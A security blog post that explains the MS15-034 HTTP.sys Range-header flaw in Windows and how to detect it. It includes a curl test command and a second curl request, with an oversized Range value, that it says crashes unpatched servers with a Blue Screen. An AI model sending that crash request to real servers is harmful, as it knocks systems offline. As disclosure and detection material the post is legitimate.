Detecting Microsoft HTTP.sys vulnerability

On April 14th, 2015 patch Tuesday, Microsoft released a patch for a remote code execution vulnerability in HTTP.sys module of Windows. The vulnerability affected all versions of windows, ranging from Windows 7 to Windows servers. Microsoft’s bulletin MS15-034 talked about the vulnerability only in brief and left the details to be revealed only by reverse engg the patch. It was a race against time for people to patch their servers and for attackers to reverse engineer the patch to zero-down on the exact vulnerability. The vulnerability was assigned CVE-2015-1635. In this blog we will see what is HTTP.sys is and how to detect the vulnerability. Understandably the fix was to apply Microsoft’s patch.

What is HTTP.sys?

HTTP.sys is a kernel-module which is a HTTP listener. Prior to HTTP.sys, windows used Windows Socket API (Winsock), a user-mode component, to receive HTTP requests. Having HTTP listener in kernel have following advantages [1]:

  • Kernel-mode caching: Requests for cached responses are served without switching to user mode.
  • Kernel-mode request queuing: Requests cause less overhead in context switching because the kernel forwards requests directly to the correct worker process. If no worker process is available to accept a request, the kernel-mode request queue holds the request until a worker process picks it up.

For more details on working and advantages of HTTP.sys, visit [2].

Vulnerability

The vulnerability exists in the parsing of the Range Header [3] of the HTTP request sent to the server. By sending Range header’s value as bytes=0-18446744073709551615, triggers a buffer overflow and this can be used as a test to detect HTTP.sys vulnerability on a server.

Following curl command can be used for testing:

$ curl -v www.example.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

If response is “HTTP Error 400. The request has an invalid header name.”, then the server is patched, any other response apart from this indicate the server is still vulnerable.

Sending following request will cause Blue Screen of Death (BSoD) and thus causing Denial-of-Service.

$ curl -v www.example.com/iis-85.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"

As per comments on Hacker News [4], the vulnerability affects only those server on which “Output Cache” or “Enable Kernal Caching” is checked.

There is ready to use tool available on Github for testing your server for HTTP.sys vulnerability.

This attack is similar to Range-attack on Apache servers, causing Denial of service [5].

Keep Hacking :D.

REFERENCES:
[1] https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/a2a45c42-38bc-464c-a097-d7a202092a54.mspx?mfr=true
[2] http://www.codeproject.com/Articles/437733/Demystify-http-sys-with-HttpSysManager
[3] https://tools.ietf.org/html/rfc7233#section-3.1
[4] https://news.ycombinator.com/item?id=9380889
[5] http://seclists.org/fulldisclosure/2011/Aug/175
[6] https://security.stackexchange.com/questions/86201/does-http-sys-vulnerability-affect-windows-not-running-any-webservers
[7] https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/
[8] https://www.reddit.com/r/netsec/comments/32n3m2/cve20151635_rce_in_windows_httpsys/
[9] https://stackoverflow.com/questions/22598350/how-exactly-does-http-sys-work

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s